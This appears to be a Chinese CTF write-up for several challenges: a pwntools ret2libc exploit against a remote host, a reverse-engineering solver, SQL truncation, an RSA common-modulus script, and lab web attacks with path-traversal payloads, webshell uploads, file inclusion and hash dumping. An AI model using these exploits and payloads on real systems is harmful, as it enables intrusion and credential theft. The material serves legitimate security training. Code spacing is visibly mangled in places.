如何分析CTF題的writeup

這篇文章將為大家詳細講解有關幾道CTF題的writeup，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

這是一道比較簡單的PWN題目，首先拖到IDA里簡單看了一下程序，如圖

發現在讀取，沒有棧保護，所以，在read0x34時，可能替換game返回址址，先通過write(1,write,4)(game作為write返回地址)。這樣讀出write地址，這樣就可以得到system地址，因為又循環運行了，同樣在0x804A06C寫入/bin/sh\0,這樣system就能運行。

Pythonexp如下：

frompwn import *

defrungameAgainPoc(p,yourname,flag):

   p.recvuntil("First,what's your name?\n")

   p.send(yourname+ "\n")

   p.recvuntil("doyou want to get flag?\n")

   p.send(flag)

pwnelf= ELF("./pwn")

libcelf= ELF("./libc-2.23.so")

gameadd= 0x080485CB

plt_write= pwnelf.symbols['write']

got_write= pwnelf.got['write']

#p= process('./pwn',env={'LD_PRELOAD':'./libc-2.23.so'})

p= remote('117.50.60.184', 12345)

rungameAgainPoc(p,"ichuqiu","0"*32+ p32(plt_write)+

               p32(gameadd)+ p32(1) + p32(got_write) +  p32(4))

write_addr= u32(p.recv(4))

print"pwn write " ,hex(write_addr)

libcelf_system_add= libcelf.symbols["system"] +

              write_addr- libcelf.symbols["write"]

print"pwn libcelf_system_add",hex(libcelf_system_add)

rungameAgainPoc(p,"/bin/sh\0","0"*32+

              p32(libcelf_system_add)+p32(gameadd)+ p32(0x804A06C))

p.interactive()

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 Antidbg

IDA查找關鍵函數，發現有一個循環比較

初步判斷，是一個8位數，于是分開比較

#[ebp+var_6C]01050D02070106010206000B07010C06

#[ebp+var_4C]02080602

#[ebp+var_5C]0100070D020108080D000103040D0303

#[ebp+var_48]02050009

#[ebp+var_44]00000D02

defcover(buf):

   buf= buf.decode("hex")

   rbuf= ""

   fori in range(len(buf) - 1,-1,-1):

       rbuf+= buf[i]

   returnrbuf

defcover_hex_lines(buf):

   returnbuf.replace("","").replace("\r","").replace("\n","").decode("hex")

var_6c=cover("01050D02070106010206000B07010C06")  

       +cover("0100070D020108080D000103040D0303")

       +cover("02080602") + cover("02050009")  

       +cover("00000D02")

#printlen(var_6c)

byte_402178= """02 02 02 02 03 01 01 02

0101 02 01 01 00 01 01  02 02 00 01 01 01 01 00

0101 02 02 00 01 01 02  02 01 01 01 01 01 02 01

0103 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0303 0D 04 03 01 00 0D  08 08 01 02 0D 07 00 01

060C 01 07 0B 00 06 02  01 06 01 07 02 0D 05 01

0000 00 00 EF 28 68 5B  00 00 00 00 02 00 00 00

4800 00 00 E4 22 00 00  E4 16 00 00 00 00 00 00

EF28 68 5B 00 00 00 00  0C 00 00 00 14 00 00 00

2C23 00 00 2C 17 00 00  00 00 00 00 EF 28 68 5B

0000 00 00 0D 00 00 00  54 02 00 00 40 23 00 00

4017 00 00 00 00 00 00  EF 28 68 5B 00 00 00 00

0E00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

A000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 30 40 00

E022 40 00 01 00 00 00  E8 20 40 00 00 00 00 00

0000 00 00 00 00 00 00  00 01 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00"""

.replace("","").replace("\r","").replace("\n","").decode("hex")

byte_402138= """00 00 00 00 01 00 00 00

0200 00 00 03 00 00 00  04 00 00 00 05 00 00 00

0600 00 00 07 00 00 00  08 00 00 00 09 00 00 00

0A00 00 00 0B 00 00 00  0C 00 00 00 0D 00 00 00

0E00 00 00 0F 00 00 00"""

.replace("","").replace("\r","").replace("\n","").decode("hex")

dword_403018="""0200 00 00 02 00 00 00

0200 00 00 02 00 00 00  00 00 00 00 00 00 00 00

""".replace("","").replace("\r","").replace("\n","").decode("hex")

#text:0040110E                mov    ecx, [ebp+var_4]

#.text:00401111                xor    ecx, ebp

#.text:00401113                mov    dword_40301C, 3

#.text:0040111D                mov    dword_403020, 6

#.text:00401127                mov    dword_403024, 7

#內存值有所改變，所以修改一下

dword_403018= dword_403018[0:4] + '\x03' + dword_403018[5:8]  

          +'\x06' + dword_403018[9:12]  + '\x07'

          +dword_403018[13:]

printdword_403018.encode("hex")

fori in range(0,42):

   hightnum= ord(dword_403018[ord(byte_402178[i])*4])<<4

   numbershow= hightnum+ ord(byte_402138[ord(var_6c[i])*4])

   printchr(numbershow),

flag{06b16a72-51cc-4310-88ab-70ab68290e22}

0x03 sqli

本題是sql約束攻擊，注冊用戶名為“admin   ”，密碼為符合規定的密碼就可以，然后登陸就能看到flag

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 RSA

opensslrsa -inform PEM -in pubkey1.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

   00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

   3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

   8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

   dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

   03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

   79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

   ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

   2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

   e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

   e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

   8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:

   42:17

Exponent:2333 (0x91d)

opensslrsa -inform PEM -in pubkey2.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

   00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

   3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

   8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

   dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

   03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

   79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

   ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

   2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

   e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

   e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

   8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:

   42:17

Exponent:23333 (0x5b25).

可見，這兩個公鑰n是一樣的，只是e不同，使用RSA的共模攻擊

Python如下：

fromlibnum import n2s,s2n

fromgmpy2 import invert

importbase64

importgmpy2

defbignumber(n):

   n= n.decode("hex")

   rn= 0

   forb in n:

       rn= rn << 8

       rn+= ord(b)

   returnrn

n ="""00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

   3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

   8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

   dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

   03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

   79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

   ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

   2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

   e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

   e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

   8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:42:17"""

    .replace(":","").replace("","").replace("\r","").replace("\n","")

#printn

n =bignumber(n)

printhex(n)

e1= 2333

e2=23333

defegcd(a,b):

   ifa == 0:

       return(b,0,1)

   else:

       g,y,x= egcd(b%a,a)

       return(g,x - (b //a)*y,y)

flag1 = base64.b64decode(open("flag1.enc","rb").read())

flag2 = base64.b64decode(open("flag2.enc","rb").read())

c1= s2n(flag1)

c2= s2n(flag2)

c2= invert(c2,n)

#s= egcd(e1,e2)

#prints

s =gmpy2.gcdext(e1,e2)

#prints

s1= s[1]

s2= 0 - s[2]

prints1

prints2

m =pow(c1,s1,n) * pow(c2,s2,n)%n

printn2s(m)

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe} 

0x05 拋磚引玉

1.根據CMS版本，在wooyun鏡像站找到漏洞細節，

網站存在注入，但是數據庫用戶表為空，另外發現發現文件下載漏洞，

down.php?urls=data/../config.php

下載文件發現DB_user/mvoa用戶的密碼

define('DB_PWD','B!hpp3Dn1.');

flag值：B!hpp3Dn1.

2.http://url/www.zip，獲得網站備份文件，在config.php發現DB_user/root用戶的密碼

define('DB_PWD','mypasswd');

flag值：mypasswd

0x06 暗度陳倉

1.發現下載路徑

/u-are-admin/download.php?dl=

顯示文件找不到（u-Are-Admin/u-upload-file文件夾），發現關鍵目錄/u-Are-Admin/

flag值：/u-Are-Admin/

2.在/u-Are-Admin/目錄，可以上傳文件，上傳Php（大小寫繞過）一句話木馬，菜刀鏈接，netuser查看系統管理員Hack用戶的全名

flag值：Hacked356

3.shell能夠直接查看超級管理員用戶桌面根目錄admin.txt文件的內容

flag值：ad16a159581c7085c771f

0x07 瞞天過海

1.AWVS掃到注入點

/cat.php?id=2

sqlmap直接能跑，通過注入即可獲得后臺管理員明文密碼，serverlog

flag值：serverlog

2.注入也能獲取root的密碼hash，

*21C5210729A90C69019F01FED76FAD4654F27167

然后cmd5解密得rootserver

flag值：rootserver

3.登錄進去，Downloadlog那里下載日志的地方，可以下載任意文件，可獲取C盤根目錄password.txt內容

/classes/downloadfile.php?file=../../../../../../password.txt

flag值：c9c35cf409344312146fa7546a94d1a6

0x08 偷梁換柱

1.AWVS掃到./git源碼泄露，用工具GitHack下載所有源碼，在數據庫文件發現用戶名，密碼（adminAdmin@pgsql）

flag值：Admin@pgsql

2.用用戶名密碼登錄，管理圖片可以上傳一句話木馬的圖片，然后看到圖片的地址，把地址去掉small，即使文件真正地址，

/admin/uploads/111.php.png

直接菜刀鏈接，png也能當成php直接解析，然后虛擬終端netuser即可獲得系統管理員ichunqiu用戶的全名。

3.菜刀能夠直接查看/tmp/access.log的內容的前16位

0x09 反客為主

1.掃描器掃到一個文件包含和一個大馬的txt文件，然后getshell，構造路徑為

url/info/include.php?filename=..//sjk-uploads/UareHack.txt

密碼是a，拿到shell可以獲取phpStudy目錄下Documents.txt的內容

2.拿到shell可以獲取ichunqiu用戶Desktop根目錄password.txt的內容

3.getshell后，傳msf木馬無法反彈，最后使用QuarksPwDump拿到了ichunqiu用戶密碼HASH，在線破解拿到密碼

78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::

flag值：123qwe123

關于幾道CTF題的writeup就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。